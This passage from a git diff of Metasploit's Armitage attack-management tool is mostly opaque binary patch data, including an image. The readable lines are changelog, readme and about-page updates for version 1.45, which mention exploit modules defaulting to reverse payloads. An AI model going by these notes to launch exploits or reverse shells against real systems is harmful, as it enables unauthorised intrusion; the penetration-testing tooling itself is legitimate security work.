zEFDh6AzC$}_o%*8QDr7PAvPOD@XSG&BZ5gE{Q(2{1GMQqLZj1nZ~2a3+?9s%pevMV ze3RY;nK!0>^I_;zh(F-@wnY1tj@IC-&IU~lL3r&Gz7?Dj40SCw>VMoTH7YPNZecB% zr_$?qcFk5^VW1pse8abk0idnJ4k0>M)~F|^;Fg_o-N1^>Y9B>1=6|67`-x-@c8>=3 ztTJ+gFNrF&y{s}0fdXD|@0)1@py`cK_QsV%pn!crXbc6Im@IDb(n(f6CUjU6!>qSP zk*@m0n)2poSdmR`H}?DQ%)+=Ty2z(*D6ZwZpxfid`R}12#)U1h=c<9x80ICu7+lV1 zC^lQ9bhI`2jw$1Fono3f-d79Pgfi1AaL*009FfKfwAy9f1w?*$<0+`h2G;K8-NS(Y z{d23$fUrQFbw(n9juV;|`aj3+%?1Gz7tRILPLL7GK$;R^2U&2ELRcgkZV1$L)>fto z@&lYHHcA?%Pc&kUw1w5)R;JPzb&|&#p~{DByBK@MXbPfyznP95fv&ID=Y&3xoRI8c z5_#E8>3utSoEPRW6M4DKRBB2R7M$eF#7(#fd(@rX)*wCr%U>mQC|Rgugw3=JWQHq> z`G|K^c+?nFWO72dVWy2*0)3Q7^TvCyd6&9Mh$k!utu5P?$x0ThGy>TLi8@oBd(9!F zSppMw?bZNLm<+YrD%^wkqxb0KZPUdWgJsRJ87v6NboBzIgGrYw>b7qqzb9LdSq(>G z=5(4`?b&L;V@{uCmt2R9gWgmcFc_72Jy-O?v&O49}rP znj<|N_EfsisYccV`NGW#b&hE-UEX4KhdC}UBG?$9t*3-w{BjcGRzhNT&aM9m4y{B^63~gsW zD(d;Bw?8Pig1j3R-U3a^Mc%l+%M476kIB$(9m$MUMTCQVa#-z$<63AO#;A^ElBSp{ z`~)gM#uv|fo|cZPyTf)+M4_Ngjs<5s9dq*-&}9lH^_=*e>*R$ibc>nYGq}yz@ciI% zza1s-nGmLcw%h4z%aLn*|5h@cPPpi%@rTZEvvSo3l{92q@eT2KM7)zLA6NdtY$qna-iQsr z0f+34MtDIff1)-tYWLuA1C7S;fLykY+{}E#X8Jl@e+!>05Da_)4T=1_OX-s6jtRS2 zYKes9jODXA#C>%@iCOL=eT9;@%TkH|7kARywY~R1y>}QcDgBo0gkFBejdB+ZIOyUp z+Rab63&AR_f^6=R%vxHO(wT@iLX!)aLChJ&F^EB2*`*hN?@*eM;P67qCn@c?KinVo z37UOPKCId~AZ5I*yMR9%`{5@Rp@!-c6+CP)kT48H)%t~M1o};%_NJJZK>io+f^tyF z_|7p(^zYl>2ttq)Se!4mZg(K`zn^_b+hvBP@8sbX`a5|5I&U*l0e)t#c#5`#ValrF zM$1&hES4(B6guJgS##QZGF&?@1bc(Pk`sD^L`D3A92QF|uM7;Gr0atvnTgFEHd1-3 z_qy8d@Vn};y1Eeh`n<&oIzpI6Tr;nz@?Rvzm|k28?>0_;kWqH98xd-c@FMULreELl|g3Jpq!_0 zCj(77%uX?p@7s}4Jl;crs{96H%x$m=4C~I}7AQ<#4MQ&bGY%r0E}qIs0+7rg4#rX)<3jnRw9oJbeRgbc<;LgC6 zC7#(-3rksqq*9jz1FK9Ea1-&qnEl4b@S0^p~?F&=)CW#+2ZxSXpbT= z>4NvJr(k3n8-OZVFRO$#^L#DlBJ`ivDQTq$X0M_`BuG31ineOM$rO4u(RpiI3MSiJ z;g=@r1qe{NyOq-W&BYvFvK#X;*NlHBY_2!17*aU@4W6s>dhVA!wGgsZKk|@rnPe|J z%b}f6!tAa*hn6=?-ODm!yJ?8R=(aIMIG~igjgEqS^abEkLBxA)g1%B8hR(Gr>|>9$ zqO+(1y3JG0l8qA1;P!i?-0I~G{eumLDbSqu9MGC*Im^1~yn%=7rFjgVcJ$77{d(hM z=LBp)0|w@b#Rhr_U{G$k_e*7D@u-S7L}^DD1S0g=8p$B~706#^A^w!k8C@w4+ad@q zwL>GPR)8NPnO2b)`DFj_#8~9#OEX~X_h4!&K27jPs+0jBw41@NVLni+rng?hrB?BA zRHG>y(#6c#S+bvThiK+s;%AE$OYr3RL+wIozLOX2wan2Fmu9s_^^-vEm^$|sJcVIR zj-%XRn%@PHi{nZ8cZNeaTf#{@M;xjskiIhe3V?-t$|f91XySh(I^cC^L1XLt2Bgu0 z6V}@s*pVi6kIma}S?63?bK-0sKxL>Cmmp!$IBEEs#-Ar`aL#xkzo4)6^7_3TTuZ%< z4r5!C89jd$L*{uBj6VmUa2GIyzSfSivV5#V-VO;W7#u5?-!;8gnm<)Okget;Dcd+2 zdGd($T>KOaBw#WEG$2J0R#OEGM;}zqWR3ahqqT=WyU1VPV-?x${hxQZEnH?eP zf|azE)u`jC+WU^cZ&MpbQ7FT#mKGS>_& zIBO4~Ahw3%AmSkEAo3tead6Y#@n*Tmk5tEF!eBg~Tc_Q-5IFqc_1pu+_#WDXMI7#% z@O)?>C6s%s&j8eJy$H^4GW7WwBdFB*D~jNiCPo%{eMxX-1jvB1lSgi@FH&TC{{U)Z zeK$_IO91r`tuah~rV_)%3oMOp^#0fTlcT38T0@oF%3#e!&#)90gN6-xf=t)OFnQe| zS7nj0RA=as0LuYSs%aU$*cf?T?m?AAgamxfgv@8D`zB3GTHmg=Ev+Fp3c53g;U*iC zXAdJ=KjA-~Iv)AKyC5SN>dc%T z?Gah0gP@TMD7Jw1L@x}8!L4^3T(5P~b_+5{x^*K@6}fjB(;uCT&}P&Q9RQuOGmuB4 z7V%9)E?u0d9-V>kn``n+>TI|8@l3@uJT8Mf^|)N^=>)T-9FHRKwM>0ZGFH~7EHxDj z=f8TOa|ZpBwQ9MqaB~)F@KTa(fu_C2GvK7x_MQdFttATnB|Rk z5c=OJ`vDnP9fawy{D|+G0w6Lax{Q$hYNHt+6hN$fDZC=Hp}DPb+Zn`lQwru`1aLL4 z1|&-G3i79C6i9976g-3)$7QgVycydYlX7yd3+0gmnuP?}QBxXy2eT%bGyFzef~gsx zLJws1%nm|&Q?syT$-T2k(~{TP6+quJQKrm8*^IMayT|2Hot9x70ChT-V>1r7OpNhi!OL92JJ_8uBM|(_iZ%=vk!W8zl!w3H zU}>&yFPZ~)>j-is0EkWP27|lC)`pu>hQhomaQ1rTUkV(#VHggjI`$6#Fe;E#jkx@7 zR&IVNKD<9W>E!j8^YV3#HI#E>3sPr3nrt)9)NICD{JBvR&l=C9sWd4=PSDSgQ_39J zV9CoRz+72s-ia`6)LCH;F;RMq4m%mV=7969>bbMMyqgs+0Z2K(YdyA8UYY8Wr0SHZf%w4pZ2@ZQcUJ4u#+3Il}UZ82T-nW?Qc;Z zASZ+TsfYMyfPI0&ejbQ(=K?BqBTC%KP+iJq)_HBp2iAsad2EYc74r1YQ9kTcew?!= zBQ&_RLvi?i^TRHX>_5v|h(nh@6we1`A8z;@u-0AJc#fk$ z)zv*c-Lp&0vaj3BvoH1FY}(<+3HcMl9y_^hs_^&ZKO2m!e0-SyliAKkejefMll^U8 z*3z5vroO??<~p|?k#18w&)(wJGXGyk10J=E}2=ZZJ(eQW1=d-%pty1mu=9PMz% z=iKSV+pTw%Ug5bSvccYk<9AJz z-&-7?d|_yOqZL~M4_ypTf3i3Kgjk&5GBCSA`PH@OJ^Qw4cH>4Lhqb;}t3|VKqm~pr zyylVCd}%GqYD3G!79D(0t@lISj-a953rE!&)8LJ3)@hq9gRDmFcQ>q99NYO)+rwMW zEKBOVU-QQT8_k)sXVdb^em%M^oCfS}`PzTk;=RAyE{jPzTkEeC&kv7u>J#8N)AnVy z$Meo1)>$*J4bnbsnf1OfcueT?)ROKEV*P5ID7v)%j@aU0_do8PuQVfZrQfX0m)>|U zc(^Ir>qF7|!_)M(9#0I%E#+Sks-D$!+EPmkiy4&l1Y7FOpBXlC#>vW+ zJQjm7Q)bYaqmuQu@E3;FoO`EQgw<+r3%T0cmxk@eJ@-wo410{5_x;}*E*RgvZv4>@ zXB3$A$?(otobtu6!zi2Z-B4gGezX)dytuWLSjq@$t<<7UD|#Bya9i=1vG~DW>}RYj zQzyC_-vl4)Chj+)310Xu2>HN*p81L|`O(E~Ke4Y+$^m!vZ7l-DyOz9ItE`x-m5a1L zR4m}4Sz%%squ&$4#m~kH##a_MaxJP^RXo5&zgHFgjcx@+iRTp$YltICmvTZ~G^~yo z#a-D_M;y*e5vig#CD#?RIeEISSeus|V#TGrv@uq!!%JE9AnZ_2EXT>J^~4$~V~SkL zixX3nf;aVv6GwA_H*sPUUP2Atlu=(S%SqYfvige2z!Y$A*B2|82$yf52q!iWV>n}4 z1I5qN4aE8!Tb~SFv7s2k$>j|}4sIw`RLNLgT97Du=f#UboI>losZP9D{y!#-W?a@i zw7(g+2jWFf6Y{-E2DAWIpCI~iU775`NLlw9l$^I&d z7<$u|Br(*awl7I0k@Ke5WQCMFaD1}TCy06+SCixK&_wLZ$($x)Jrl;QCQ8T1ZL8SS z%=;cq74K&?6?rNVa-l9aAUAMiiXtNC?12<9jB{mswyBCea2s%j+{(GBN~2}RFQzJv z!#{8Q(_OI=7naHPDmk&4Sd}x70+o5`T{E!{FU@QT-Ol_<*C zwxzAaImSsMvW;j={^4!J1fGCL+h9n_spyralzOYBJ!;9Rt-|fp7K2;X_){&}v{SHj zwX~_7qM>Q8lv=8#)$PT0+=^AYn8Zu1($QzK<)!IjJTE;?7n6CZRtK>mFOBP6^&)78=iwd8$D;by3%Rch(!DW%$o(~8^>wX{bqY0fBe32JE? zN;b^V>_c}Koup1hq8mLugZV*r-lIs-Xs?!*tEC4;N+hGsDv_LU7B?7K_rzJHZDr0W zR$8A^{96o6u6N0Y3tvw0dcT}g>aF;R4Fdn_lWCKX>LI^!@^-2-$7_e?)I#`8lfjk60^+ zArWP|MH)(5Sgf$Iu<%l~EG+VK=l*R?ZO>YJ)5d>9d#=47+M195TGPINtjpzHRAAjj z7(IHK!Y_(tWoJ5cS(kMZ?W%@tLsv7S*Y8muMQTX%8VwJj+GzZ{TlODsl}~=|l?Sx( zq8KRK8h`z{*Lc`@h#d-ZTc=;rOU2gA_>*haVuP|FHZXz|L%8PWj(bD7|BCLE@ygnP z{EmtCvemw2o`wa(;vDRG_?XG}`NHHwc!M|miw2(*wDV?ZLulP5qwB z_J;b&&n+xPftN%*S5CbI_P#T#nLp*MysWm3?*($n7~AP6M^%Wl=Z+1#`AMj zc^=$m&C7tRx^URRS!+$6Ig+t=a>28_OeL2^KicW8b)XY}866(FecQ3Mi1cn33yVP2 zT^5}|-c2$g9!G$XI>13L1C>4fHmXPY-7DmAEsRSK!RCP%TZbqz$AR1C6z1 zHGaP8H}qIr^oO6Bc5yfbUKPFQ`4zE@+zqEb)Z2Uq6^%hfNM7}mpL;}NqT#%vl&eUv zdr_3BB8wPOm_XaFilMTl%iXJwzK$Vt5zRCoHZvNNa80?vhh1a&-<0C7VIe4wh%AN- zZcWpG$RlFO9}EBOisWsCL1^yN+H@`TYo`s+rzBbmt{Phl_GM0Hq|!m5xFK4*56v(i zM2Q`>_Wu0LciqE{AvOKKEZ2Wzsa?hP?UmU@)fB4ZgO4CtH+W>QWgm{eKX ze?u%I2jP3k;HX3dAQT}jXD0f3q?UGMYlG=nd5Mpu$e^6zJt1d6K+Ihql}m9q71#US zM7x8=)6|9dWrG-96CpH6!!IiGq9@p!UG zOPdyG18CYUCCG~zUTe9QESGA_(RCGn#_;khwIr?7y5+6FaC|XKvX`5DqTIle(}>J# z^n!WP_gXE>`%vH8iv3ZyG1mH0>K(Bh?YV87gPT~U9Lz&}zaVf`%!1Z#J(b)RW9443 z`hLB@!ybbXnPT1x^)@i6vNV*WGCVma-$8^H?_{tW?Ybida`+~LTOQ=F?yhmx&3YB( zvl`XD#9z2s^$Ux*XuGpoXBv7}bmeAd-i4W|XH9rR&S*X8%AdxLb%=QscLtsM4+d1I znZew@RV5Gl<&F}S)O#>U*Xh7LF^Hz$6J6v6zk0sPW)8yg2w@S;%#6ChM5AS?fZ)j= z=Ap7AR2FO|)$taS3Z$6(#<9|8%CB`-LgY67Dw>H#KB3$PsN1&~J!_LD+6S=V+1&N{ zZ~1V*8ojGGlMkev2MG9s`=Yn(#LNxJwtqt+3DV|0==7Xhe)~l0N}q-qBUCf4Y2AMK z&m`II78d2rELVQP zWoAYCv{>Q|vECP|Zv#X2Fk~L1rd0G$^d-^8#*TUnHcrIndL`8!0nu^VAMaDe4s`aR za-Xt%gvwTwv7zNIHa=A2k@A$;mf=_3WIRajWjUH(@1J|g7AOm0*?fN7NKVCgT$%1` zV=V_?4(YYpbDPKizv5McNLQ@P1$Ch*Y%9kQPa0S(Dg%JQEy8G3u`*wuWys73dRi<7 z2eK!WcJFuTYoY=-_+vh9TU4e4k1@%Ll8qH5Jw|ZlCz|$;Vc|$s&YS)iS<2wE1$UNg zK(}v(Df3xuOcWC}KKnms%DrkZ#Ek-;7?q1k-M`3Y*7;C2_aVL(7wryFUj4`?un-W< z;X=j2+&|9tW!10x9}Ai~T=aTvgmv#er4^1(F#{D-)>AaF&QqfwcE7(Lx(Zen{g0L1 z^|+M@5aoU>VFnhE1CPW*J}HSQSMMCfGRAf>szztOs_)eEHlMq3>N2Z^W7@y>G&lTrfMG$-GN{8!j`QitD+gHN7$0xzy! z#5O(uMXQ5VGt9p>D`kc9G(%mEo@9oiR&zsnC1QEmMCTm`=RQO8Mq#Y`nwe<5Mi%v; z^b$eYnBRH>Y*d2B<_pUnS8d2}88Po0hvkUu z$->tNVd6C#a=v2YOH0FyneF%2jj?lKV;la=pJ963&wGR0H&f0$=e#ckl}P_H^b8NE z-Wz2%sm~iUcI!i${6>rs(wP-@(G3Z&dxA*i6`HPX|6=Dw}L;>r9E?M0=X4g-lC3TOHOY{F9%%#DPl< zwX=1SA1k<2nfI_X#gX$QZ`)E7|6Y`Y2JR-v?Dt}%~u(%#F~o!ah#H*!rj zA7G=Eud3l_;zb+AtKp~eO3}0rVr9Y0pCQeJ69JqP`cbSY><#3^@Q-43VN($O`BAK| z`B>SO_DQxrto1so_zAspq>2o=QQ9XlLQ}4WEm=m}y3n#uVhv6InnvoyC$YMweYBB^ z{wzjnYSodc2)qvUj3N2>W1(9R4QlBm%iO1C`jXsg4_p>#`?&PFBQ z4D{Xyrj*^qXgc~Eny~#RBQ=vzZ@L<(yPzy9Q|@;$gaW!kb@z8sN8P?7+VQ=}@4Hxu z)_xaj3j=;;M8$bdk|b0ZIWJafA_$}B&5~LRTgKz!o@Xi56gEr(!;L0RuyvicSLxMS zQ_S*b>@=EX3GK)kblXyDCM=jO>ogXmTEfP;a(R&;#R<)RrQ3p(Bod6K7&VIW^hX(@j7j? zfmT1Q6eE1UsS;W`t3?MjyQ?Cl$lpea6v{kch%ddq%k3Fmm}di{J)SUL3qg9p-7K<| zoJemAJHks7S@Ynp0{W*59x;krWG_vCDcG+6e9UA<}4C)+a2V`B}gfC)ca&~i_7 z%@a>MFUqh7@0%UW?{G4Q>k1XURHQ6jwMQB_`KX9wVs?lF%wFDOz~h!UXAA23a7s;mH0nQX64gTN8Fc8>OOM?ad-ns-r4ZmDl#j z1+|^*q{6{e$5l!eN_RIwj=Q2;`ed3QeR`o=|LgMpZZPttpNYViK6Z{K0uPyh?Juf; zcivE?xoPfTH6Ed|yiEFa7vn`v;JoMV7-dtZa-xw3Leg?3Czg638W-j;BAE8fvU8%G zLS&r3r{ph;oX6k_)N_uVGi$Lub(?SJYI1kmynqR`60Waj*8uYLlB#QtZL_2O+u>pl zFGxouZg zUL#N`AIaacEd}{Xt`y}X)z-v4up^s$cA>P)hnal{)q8d!0Dp`ksaAS zunVHEO~7p7i?Ez1CTBm4zRA8)W#Q&yPV9YT$9M85#TPg7w@h%vYsPCX{P~7meJIxt z3i)pt;ZCDo+j&rJe;B?0$t+V0UsVAsa{7#c1gTKLr8FG~fZj-dguK5sCz4Cs;~we* zBk%oD;Uq1GLjur8A8m{Z0T?MUSStffeQR9UGk z;F@?4WA(Q!3r|a8I8j&@&KzpMi6wFN@)A!+Ya5tV^g5nm%b^Jm6WG;{j!6;n|h8Lq!RbE}ewG}5`G`Dx8>c1ghbIK!) zYqa6;*7C6In869#3Q{$payN>tAY};E`fyN}36GCYf}$Ls+Z9m5-~lSnhI}icef5W# zAOk8&RfM#WDx#&@+4lBS^CMOsDe+QiI+||4_Q|58!s;fOD>@ zaGcQQmP$C2lOA_7ug?r=FH9~?C3@WKw(6xCLWDgdItq_m*|jVcm2t46Q3hB$>d6ov z>h0y=LYEB~g~z;1kXj<<-6=jQ;zfH!XkD(xksVbW9I4h9)+KCcmy^)1+UlIwR+8!n z@zI>9Sj)l5MDQO7TDGIu2-IvBfj~E^M?GVWG*s}`YU(*>J%3|YAjn+7rj?39=nR8y$Z;gW& z>lGc%-)1Iodxt7uMGjTrXVL+Vq*q1bCSbpl>2IrwPVae$EF)2eRW&I=*obu(Bc>d5 zaAy;(j;2;ai`VBxqDS^t!>sc&7Gsf^;a4ALS69k8>fn=ClerKHuLom+Wkjv1C=zu| zzr~T6)v>b8zTx063wMu#@XmWGt32(F!VRg*a}%USbyQdKMnzf*3Ex%13k!P(HwvkN zPSt7XKn*E`bTuSrno$F}^i{`@p2A)icJ(CxT3C{;b#~;H=hj5!SKL&V3!QLrEW?}o znDGXAs=O4Tp^r*95!J$?#l@fWwULaUYoV%{6&TS{I3GgiqOsy!UK_)|jKqo8wK4MM zMsgw{8iQ_QZB8s?#OZpBNEO;QW>e1hHBsC;WRk+R^s9uLxH`cRml=RErccxXByGD1%ad|2K#0J~@mM{Mq6*(5Ij#?Npv z^{Z$W69^{55+_@#-4Kbl>{kZ3ikmCV1IyX8!M44JTC%~ik4xINi0U4T~fM`5%RFM>6l(S0cs7oW3z!f>N zwh@MqUtO8VYb-Sqn#OWQMq~8&XiPq+5)3;!(-^_q632jGS{$phrIsG=fbj8 zN5#o7nLdoc?sS7Ks=}JUZgjQ@GOY1TTcb*Ot7|(mD3GZkMTKn&E6-f}1 z3RJ?AV%F)5nRKGS%sZEjs+1FbDbP9bHKj{4RM2}5=jqPrtSM=i&W=2*A~eJHnprrw z-$ZIjGt3IrFgvrj$a*iE!Lf0FnIKJ@L*~N~6Xfz?osKv9^GP$?_0O0{eQb{2U4!E* zW;>+?Ci|dsDxsxqEx?XEuPV6nHE7kAXi5Ba71o)=Vh-b_-Q+x}mE=Hmuj~BjMN8ye z_-z%A7UEv2gqEhZ!XrWbH@Z199DJ$5E1er(F;9M{GhL&f|G)+Qe1}exm(<-`OWvB8 zuN+?1TB@a4R@zxM68IUhou+X%U96XF1K+AUQcN3+lL8l-+D7VW`46S0AwvsYoV{uH zTV;esronInPiL}ocdo?o329g*miHmcws_dlc{yw4BU&1l;%xe`^LH~Q&_+0($pv%U zVimFpGYQjLM9?}u5%boIwlH>W1&6D(gG{d?PRwA$!H=9Mcn^h=c8J{tkGm_JeOQol|IMJ2e%B&DTVozc3EnT$vk8uVc{-6=5B#glIU%4Pq;prSx+c=7t{AKEpcFOe3ZEu!VQMKtiyd5D zzs;q*Y~H6Ei|}raCU%n|=BvZ||i=-6XzQ-YqG^;=^Q1i!HM) ze>g`8*-tmRN#$f)XBwwB8-df7N%%8A(`%7PLER9baKyGbL)>UocjIZ%35#Ay%dl1y?`7UNsW3bT74O^L{C$CNtNUXuIb)>z+-GT zvln8_&#U?w=zK59_`dch=xL_mU5HeDId{_cR?b7Bd&8bpElTUHNair)uqQ17BG<5W zc*)gY1xt(hc9uW%_t0Rv+1uFPDeGGv?RX65lIMSX!zQjG1!YRcSFw{aVg2$8hPY7S zvkIjtC)0Qa(|d8^xyyGfEPi_NV|RxBN-r~|^77e~=d~l2lW}U)8)u56w*&JzU0)UCvau@4){@d4tul zD@)MFzXbhwaN9PNDbrmz!Ckh@f`b(z$uCRdFC6SYQQGo3-c)HC_+w0MK;6fMhKYd%+Ihtb^Nap{dx}WJ8;1N(~STAyWfvT zn6J7~P=BMt6qJ;#~%4Q$|;zi2sTFm>&3bhzx|$$4`iaS=&uKJhLePAmH>Q^d*s z2uHVx^sv7&q#XwUxiytS2Po;(gdrDaQ?CKaG1$16YK{9 zsj`hK4OCJtg&}`!qs)Pd<(Ul0I6~_ON&#}1|NGYlKW4$u6ZB-Dl2i7BpjZ7CRT?D4 zYA!qsrP%Ue9yDf<6rq{=$Vi803W~jrhKJ*M z$l zvG{Jxk+igEB-W$7(oB$Vo#DHG$1sPyQ84U^<(w)kvr5>j6@RFax zTv^hD3X?Ka*nw(wLlF8hczkCSjuWbMRS75Z%7s_y-BrYaoPI{X4bO#^M=uljcrKQ@ z4w)uMz-T;N)xd($=(Phq8GtAqXUW@huvzCm>}MkN>)mHr`&C zgzkP;V1g{#9A-~}lcDu|vkAO-2YTXC9(r*6WHjr}E)(8?$?&7{evas-pbob~ChWdb z@Nm`Zs0ngp3WnsA6Gnxp*nY}9ZDgNC?SAJ`SI$(pP+Vl9b#f{?Z09)>r02h3?(B_5 z%&XJjRQ`FDXG3oma8!rDE@6&FxPnm9Zl8GVN`m$l&bmnYZ#?Xmzrpz zEW)Y8IXsX~OvjA=O`!^{!ktN+fjL*BF$w^(rd`@_dz!&;yV9ok-5Hp%$6Cu!5Jk_# z}BeiHIb^tQ$Whx|Z7Ia%X%0vJq;n!h>X|6PK7N!~lUVfR4L-$9s*oK*rh?mgu{T|Uw^|r`ad5Z;eTc?WqZ1Iq3Q^ z6*wV=hhrL_gOCr!krz{~JQvmU4rhc9jhzdx&R3?bbFl+wTa7H|;n?j&HAcuG zOhYAf!xlhlZeJPqrz7)`Tqghty9ZJ9LhJ>8U4XQ2KYg2J{n<}A5>*oJ!u#2EIefH# z&fx~j@uI`*7o4Ewu-o|+C+;nms#q3K?s7EC@EdHu|G*iGzQHzLS;FgEzhU#j@*9T( zS73TB(CA(0=5MHX{dX0P5~|}n5cvqHB7R3_B(K4;=W%UL z{I&*n6z95}*x5jj+wLkP=6$7&jtL|SCGypa7Bte^QTiGPzD+a}9MF&nx|3Iu zz6?DnfPi)_`s-pN4re#jJ5uxpz-<`(CXvpqmBMK0TC}_qcG%WRodsPgyOyQa>yX_J zEjh8Tt=^5!tV1|_(>QXbgC0-e&KN6o*P|c1w`Xt=&3i7E;S&$7M-9SHJOIbmqnVSs za>CGC?@S>DFc#N?Bh&ioG5rr74c>bfJ|SGgm1ufIy_5H_CxfQsOJJSV#g4( z#z*z1y&EtD>klHkLQGnB22-m-yrVSw7g}G4S-#zHJ)O%%is?2=bv1RfWh#(5jDo3E zqs>eOkD#R+VXAlpJ;hbCb)=r0$LW2jw(0=CBybT5{6kL>fQ?ni3rhJik0aRx@Cgr5B zM!nqaQdLdwZ+f~_306*Tm*O@}aGzr81;jjuXJ% zyCg5o!zxC_X*CQ^w2q1PtZtxB(S`u(*+{9)dN+bKCXveRMh?WKP(OAJYC(H;BNz6! zG*D_ggD;;zJvtanhxWWSRI&%VP1QRXpu4b9x!d(07KU_TWg&K0Mof?!}2E{m@zedA?w%nLD0% z&to4t+;$MVy3&SU4A%UMfNZ;Aa`OC~vDhhDjX(2mE{+~d%lD%h-SESMJA~^Q&ucR0$=_yWe)ecOK5r_v9Oq#F)!fhLQ@E(%pmCcvzNuI4Aczk9AJJ{o zxM;>4)Tk}QmtvS{&GL=|t7C^M65lN||9V-^8BE^z)&Cm@k*?Pk8z^_P!G&^Gzy$j~ zk-SN$y_Wj6HbN7M{XFw;d+b z*$0s2k^aVP+*@bF4Tp_3%zj5)-2`K=_`fWWWxXi-u;Rzm!-)1I9Pu5-h!hVYHCUtM zxJ13Pe9|3pWZ%^>-z#skkI5VN%KiU>g%3FXJB)i})4wGC;=lZJE8_&^ z{$<>&`SE9n6>sx%*PWsLiWK{4)SuzRWY{ye75O)PSESf4lHSBC{y9ibbE&^CP|Oiy zjb^`Hs8ok*e(tSHG(wSLzl;`%8u!AUxvhiOXg8!Pu*CWCXVMgN`MDKu8sr~MqpZV{ z2k$K3qX^Tr`&9j?vP;&HA-_MQ;Xveot3ODCn$5S?hZoacMN0i)n*WhXd_tDTB>shw z$VKBbr$gc#VrFiu{4)dXe}#vVcE^+?=zR={^xy@OAtxl`_m}FPfYodZdU*m%dA*fr zO~0H_e3;C5V+GFJ0~I;qi}T)=%tjMFBTDAxmz83o#tF>-B$P9)8RAYUCygn7^0te)L24DqBsUZNEZ zTVb4GuKg7>y$}iZ3V#)qM8h>dx08oRUwp+%@?#FqwZ*3p%$A-ay~KY#r=n8`0{h|$ z-2^Ti^QOwm(#~g`294vY zWy53~LS;UUehR0NXC&jd%-5bl^EMbnYE)J9;onhb!!aZLZq`$1`$F6N+hPMmax9W6 y$WBcUu^YA=U0w!`nM=)!5J`%HQ+ Login menu is now built using open services for all + highlighted hosts, not just the first one. +- [host] -> Login items now escape punctuation characters in passwords + before passing them to a framework module. +- Added the windows and linux postgres_payload exploits to the use a + reverse payload by default list. +- Small tweak to allow Armitage to work with Metasploit 4.5 installed + environment on Windows. + +Cortana Updates (for scripters) +-------- +- &credential_add and &credential_delete no longer break when a + password has creative punctuation in it. + 26 Nov 12 (tested against msf 16114) --------- - Windows command shell tab is now friendlier to commands that prompt diff --git a/external/source/armitage/readme.txt b/external/source/armitage/readme.txt index fd8f0384a2..5f4e54b8e1 100644 --- a/external/source/armitage/readme.txt +++ b/external/source/armitage/readme.txt @@ -60,7 +60,7 @@ sure you peruse the FAQ and Manual first. 7. License ------- -(c) 2010-2012 Raphael Mudge. This project is licensed under the BSD license. +(c) 2010-2013 Raphael Mudge. This project is licensed under the BSD license. See section 8 for more information. lib/jgraphx.jar is used here within the terms of the BSD license offered by diff --git a/external/source/armitage/resources/about.html b/external/source/armitage/resources/about.html index 29c402d999..85c4fe5dbb 100644 --- a/external/source/armitage/resources/about.html +++ b/external/source/armitage/resources/about.html @@ -1,9 +1,9 @@ -

Armitage 1.44

+

Armitage 1.45

An attack management tool for Metasploit® -
Release: 26 Nov 12

+
Release: 4 Jan 13


Developed by:

diff --git a/external/source/armitage/resources/windows8.png b/external/source/armitage/resources/windows8.png new file mode 100644 index 0000000000000000000000000000000000000000..3d2d2262b038d39825b84628951537a7cce2cb13 GIT binary patch literal 5537 zcmeHKdo+}37=JOCl-t>4a=+DfN-NnRi;R2PvMSNd8rHbPlHAvA${|9<+EhZ)*~p>M zD7M`iR&I&XRzz4y$PC71+*-5m`+ZaGAA8Q8?Y6tEIme87zUTctzvp?M+a%iC*+@z# zNB{sNZ8unM1wf=9{t<~{P_n!4wg>!J8f3L2Xq&%BP^jyE8ZdMBccZD+e&kF z4-crP83Q0^VQXpT5Z1=-sPt>+DOYe=TBFpwlH>tDQ;M2vOYU8Uk1*Thn@4^T2Sp7z zr8adRl~$@yY9br8sfV1!3a&jlLr&lJL&}N*4c9U|^>Swav9yV4Kv-6t*6XsU)g^7Y z1tjvnd$szIHCrWfqNZ7_B1aZ^0RU&T{5$zvgBbnzQA=xv-lcW?SX~$vW4mBY6rBT7 z@QoM*-(=u50y;%}Uic;fA$;~Co|H2pFXH*15*lly$^yVH^Ke+m@z5OKwWVK){Id&x zEQ+-0shEh`9U(B4ezj1BmB{7oH8k;!93PJ14@<`r(37x!5^Dk1x5Im8LK^w6RwIPc z%1sI78J#4KWC;NP#lxq=a%yvWQUH2FvDMAKIOcPtHeMJdpiB>zk-AbqSQ$`~F`GBm zAsIc`PU=~ix$#YZ)!N`#p;vGa8v(tt2TfGykn?u+7i;Xn5jG}sdBF)?dmgjL8Ln&o zU;&y#+;I!g9HOw}e1!621J7;p*fV;Xn=z|1EV?m(rH_@!OI^fJa30cy45>w##M>>? zv?ezTA;buJ3t1w1kkN?DmbuY^10->}iIaga$amB$P7FlP0jSX5mtX`I@7r(B9~iFA z+_L(4Z&Hbe+z7o9BM8_aBq>f}b6g6w8NM`s+hT)hd5t)F&M5N*6K}V1W z@G7A@NajP6&Cc5FjDx_y=J1mHG7OU>MPHnQs;|yLEVkDP{@A3Am=G8t-cJG4&`*0# zsSD~1^B-?K5c*vUk-wM^0K0WO`tw38@~8}6Cm?i=?&&6rwYwDv6j2R0R(OWiHcm
*O$zNIZly>6!Qj+?{(gfN^17CI0#TJRY=uq4AnbzDG)$~<`eB9c&8Y9 z1dHXgV4(e}kP!!2wkmV-tiz_qsXcuzT4Tq~HEish^}0%|Dzu_8jTFycKY-G{qROl0 z@*SUQMN?K?;B@eBTy101n3&-{xsH+j8Qnp$)^dKN0jF|TcL#0@)~-S}HB0J*4qU!f zCNb=hwC2RERkP2njvf!6m=ISqK&4YLWOQUOx8=f+gQ=Cll)KG(Vi0}Q&=wXMa##@l z_f`!bw4v8c=eOP-6cdwS%UhHdKJ~aUG&kxVF$)dWl3eV{ZyrC_F!C%@TGixu?aW?T z4$5A-gyizENc?}$3`ZwLoKlK)Y!&a)9Hj?Nl`6fHN57K)4a;(eB^;e%RU^avuC|6x z+OVem9m#q1XzxV(NiV!@hhUrDSvXE%U&mDvFd5xTo`a2!q9Z)^+<wD?{sd8A>ZWVkW_0_We)_o#b_5ZFAx6YtPqj2cFi3{x3TJ1j^!bIc!swW< z1=R4p;77n~lsdeONh{yLjuWRx^~r>S{8s8(>6}TOvG$JLALlka$ogLOKEkEnEt<^? zfp`#HU=Z4X-~xkChO|slc;Cj(tZY@xZ8YBOk9#e(8QvUFAXw1lb{D^ z8e<{=;{f$w9MI^&Wmp_g0pbRK|N3~W25Dd0if8K&Nb?KL8gD(Ad>n6I{x85Y)FQ!Ur9WkUP$FZRV{Tf^r?nw~NnwX;zC}nbSG0%q* z&3p^y!j@#`uqOF8n<7G@mp0WDn1S?L>VI$2qU6UK%3sdp4@i?9MV?=W=GUQrTc5=$ q4EwS55BIP6b?D94A&PDEVk*$)x_B`Of%>q=0$VFP%VKlt!QTP-8USzr literal 0 HcmV?d00001 diff --git a/external/source/armitage/scripts-cortana/internal.sl 